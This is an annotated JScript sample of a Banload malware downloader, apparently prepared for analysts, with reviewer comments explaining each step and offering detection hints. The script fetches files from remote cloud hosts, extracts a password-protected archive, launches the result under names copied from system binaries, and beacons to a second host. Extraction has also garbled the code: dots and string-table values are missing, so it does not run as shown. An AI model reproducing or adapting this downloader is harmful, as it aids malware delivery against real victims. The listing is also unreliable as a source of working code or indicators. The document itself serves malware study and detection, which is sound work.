2022-04-06_Banload_MSI_BR
// NOTE(review): `_` is declared here but never assigned in this listing. Every
// `_"x"` token below looks like the remains of a string-table lookup whose index
// and brackets were lost when the page was extracted, so the member names and
// ProgIDs behind those tokens cannot be recovered from this text alone.
var _
// Busy-wait delay helper: loops until the difference between two Date-derived
// values reaches l * 1000. The method called on the Date objects is hidden behind
// the string table (presumably getTime(), i.e. a delay of l seconds - confirm
// against the original sample). It is a tight loop with no sleep call, so the
// script host spins at full CPU for the whole delay.
function HowIsBigDickToYoungers(l)
{
var m= new Date();//2
var j=0;//3
while(j< (l* 1000))
{
var k= new Date();//5
// Elapsed value since m was taken; `var j` re-declares the same function-scoped j.
var j=k[_"["]()- m[_"["]()
}
}
// Returns a string made by appending `param` characters to the initial value of h.
// Each character comes from a member call on g whose argument is computed from two
// Math members and a property of g. All of those names are hidden behind the string
// table (presumably g.charAt(Math.floor(Math.random() * g.length)), i.e. a random
// pick from the alphabet held in g - confirm against the original sample).
// The top-level script uses the result as a per-run suffix on a dropped file name,
// so that file name is not a stable indicator.
function yiiufyrguyhdvhudsgfuvchydfuysdybfgusdyfbgusdygfsud(param)
{
var h=_""";
var g=_"g";
for(var f=0;f< param;f++)
{
h+= g[_"i"](Math[_"T"](Math[_"e"]()* g[_"t"]))
}
return h
}
// _FGettoSplitData is taken from a string-table entry whose value is not visible in
// this listing; the top-level script passes it to downyJr() as the first download
// location.
//
// downyJr(d, c): fetch-and-save helper.
//   d - location handed to the request object
//   c - destination path handed to the second ActiveX object
// Returns false when the request throws or when the checked property equals 404,
// true once the save sequence has run. No other status value is examined, and
// nothing here verifies the content that is written.
// Both ProgIDs and all member names are hidden behind the string table. The call
// shapes (four timeout-like numbers, a three-argument call ending in `false`, a
// property set to 1, a two-argument call ending in 2) are consistent with a
// synchronous HTTP request followed by a binary stream saved with overwrite -
// presumably WinHTTP plus ADODB.Stream; confirm against the original sample.
// Detection: a script host process that makes an outbound request and then writes
// the response to disk as a new file.
var _FGettoSplitData;
_FGettoSplitData= _"m";function downyJr(d,c)
{
var b;
var a;
try
{
var e= new ActiveXObject(_"e");//30
// Four numeric arguments (presumably timeouts in ms), a call taking d and `false`
// (presumably a synchronous open), a no-argument call, then a comparison with 404.
e[_"""](30000,30000,30000,5000);void((e[_"""](_",",d,false)));e[_"""]();if(e[_","]== 404)
{
return false
}
// b holds whatever the request object exposes through this property
// (presumably the raw response body).
b= e[_"""]
}
catch(ex)
{
// Any failure in the request path is reported as false with no detail.
return false
}
//28
// Second object receives b and is then given the destination c with the value 2.
a= new ActiveXObject(_"A");a[_"B"]= 1;a[_"""]();a[_"C"](b);a[_"D"](c,2);a[_"E"]();return true
}
// Top-level routine of the sample. Reading aid for analysts:
//  1. collect the base names of .dll/.exe files found in C:\Windows\System32;
//  2. derive randomised drop names from that list;
//  3. skip everything if a marker file already exists under %USERPROFILE%;
//  4. otherwise write a marker, create a working folder, download two files,
//     run one against the other with an archive-extractor style command line,
//     rename or move a resulting file, invoke it and issue one further GET.
// NOTE(review): extraction removed the dots from member accesses, ProgIDs and host
// names (e.g. "ScriptingFileSystemObject", "WScriptShell", `objFSOGetFolder`), and
// left `"\"` / `'\'` unterminated, so this text does not parse as it stands. Take
// network and file indicators from the original sample, not from these strings.
// The hex-style identifiers are ASCII: _0x6f626a466f6c646572 = objFolder,
// _0x636f6c46696c6573 = colFiles, _0x73747246696c654e616d65 = strFileName,
// _0x6f626a456e756d = objEnum.
var objFSO = new ActiveXObject("ScriptingFileSystemObject");
var _0x6f626a466f6c646572 = objFSOGetFolder("C:\\Windows\\System32");
var _0x636f6c46696c6573 = _0x6f626a466f6c646572Files;
var _0x73747246696c654e616d65 = [];
// For each file: drop the first "@", "-" and " " from the name, keep it if it
// contains '.dll' or '.exe' anywhere, and store it without its last four characters.
for(var _0x6f626a456e756d = new Enumerator(_0x636f6c46696c6573); !_0x6f626a456e756datEnd(); _0x6f626a456e756dmoveNext()) {aux = _0x6f626a456e756ditem().Namereplace("@", "").replace("-", "").replace(" ","");if (auxindexOf('.dll') !== -1 || auxindexOf('.exe') !== -1){_0x73747246696c654e616d65push(auxslice(0, -4));}}
// Three independent random picks from the list (the index formula never yields 0).
// unicohsajke additionally gets a three-character suffix from the helper above.
// Detection: dropped files carry the base names of genuine system binaries, so
// look for those names appearing outside the system directory rather than for a
// fixed file name.
var unicohsajke=_0x73747246696c654e616d65[Mathfloor(Mathrandom() * (_0x73747246696c654e616d65length - 1) + 1)] + yiiufyrguyhdvhudsgfuvchydfuysdybfgusdyfbgusdygfsud(3);//59
var uniqueDash=_0x73747246696c654e616d65[Mathfloor(Mathrandom() * (_0x73747246696c654e616d65length - 1) + 1)];
var codersshell_exc= new ActiveXObject(_"F");//60
// Working folder: a location resolved through the hidden object (the argument is a
// string-table entry, presumably an environment variable or special folder -
// confirm) plus a randomly chosen system file base name.
var usuario_prof_varts=codersshell_exc[_"H"](_"G")+"\"+ _0x73747246696c654e616d65[Mathfloor(Mathrandom() * (_0x73747246696c654e616d65length - 1) + 1)];//61
var dskp_textoUni=_"L";//62
var meuOBJvar= new ActiveXObject(_"M");//64
var coders= new ActiveXObject(_"F");//60
var _prof_varts=coders[_"H"](_"J")+"\"+ _"L";
var oShell = new ActiveXObject("WScriptShell");
// comp is the marker path tested below: %USERPROFILE% plus a hidden file name.
var comp=oShellExpandEnvironmentStrings("%USERPROFILE%") +'\'+ _"L";
// Second download location. The host name has lost its dots in extraction.
var complexRsa= "https://toystorehuewjir2341234norwayeastcloudappazurecom/Plutao/rftwcv";
// Run-once guard: if the check on comp succeeds (presumably FileExists) the script
// does nothing further. The presence of that file is a host indicator of a prior run.
if(meuOBJvar[_"N"](comp))
{} else
{
try
{
// Creates a file with the overwrite flag set, writes one string-table value and
// closes it. The path is built through a different member (_"O") than comp, so it
// is not certain from this listing that it is the same file - confirm.
var txt= new ActiveXObject(_"M");//74
var s=txt[_"P"](codersshell_exc[_"O"](_"G")+ _"L",true);//75
s[_"R"](_"Q");s[_"E"]()
}catch(ex){}//72
// Hard-coded value passed after " -p" in the command line below.
var _qoiwehiandhfisdufhiuhubsdiu="123456ze";
var gdfijuoiuyqkhjghfvo8wkjghfv= new ActiveXObject(_"M");//82
// One call with the working folder (presumably CreateFolder), then two downloads
// into it separated by busy-wait delays: the hidden first location is saved under
// the suffixed name, complexRsa under the plain random name.
gdfijuoiuyqkhjghfvo8wkjghfv[_"S"](usuario_prof_varts);HowIsBigDickToYoungers(1);downyJr(_FGettoSplitData,usuario_prof_varts+ _"T"+ unicohsajke+ _"U");HowIsBigDickToYoungers(5); downyJr(complexRsa,usuario_prof_varts+ _"T"+uniqueDash+ _"a"); HowIsBigDickToYoungers(2)
// Command shape `<second file> x <first file> -o<folder> -p<value>`: an
// archive-extractor style invocation with an output folder and a password
// (presumably a downloaded extractor unpacking a password-protected archive, which
// would keep the inner content from being inspected in transit - confirm).
// Arguments 0 and true: hidden window, wait for the process to exit.
// Detection: a script host spawning a freshly written executable from a
// user-writable folder with " x ", " -o" and " -p" on its command line.
oShellrun(usuario_prof_varts+ _"T"+ uniqueDash+ _"a"+" x "+ usuario_prof_varts+ _"T"+ unicohsajke+ _"U"+" -o"+usuario_prof_varts +" -p"+_qoiwehiandhfisdufhiuhubsdiu,0,true);
// Two-path call on the hidden object (presumably a move or copy of a file produced
// by the previous step to the suffixed random name); colocando_starting keeps the
// resulting path.
HowIsBigDickToYoungers(2);gdfijuoiuyqkhjghfvo8wkjghfv[_"b"](usuario_prof_varts+ _"Z",usuario_prof_varts+ _"T"+ unicohsajke+ _"a");var colocando_starting=usuario_prof_varts+ _"T"+ unicohsajke+ _"a";//100
var btcadacoins= new ActiveXObject(_"f");//102
// Opens a synchronous GET to a second host (dots lost in extraction), passes the
// renamed path wrapped in two string-table values to the hidden object (presumably
// launching it - confirm), then sends the request. The response is never read, so
// the request presumably serves only as a notification to the remote side.
var _df57d583561c25884ae7c8c4df319ad = new ActiveXObject("WinHttpWinHttpRequest51"); _df57d583561c25884ae7c8c4df319adopen("GET","https://filtrosefioseletricosdeastuscloudappazurecom/ipreverso/verrtjklopiuyrfgfrphp", false); btcadacoins[_"i"](_"g"+ colocando_starting+ _"h"); _df57d583561c25884ae7c8c4df319adsend();
}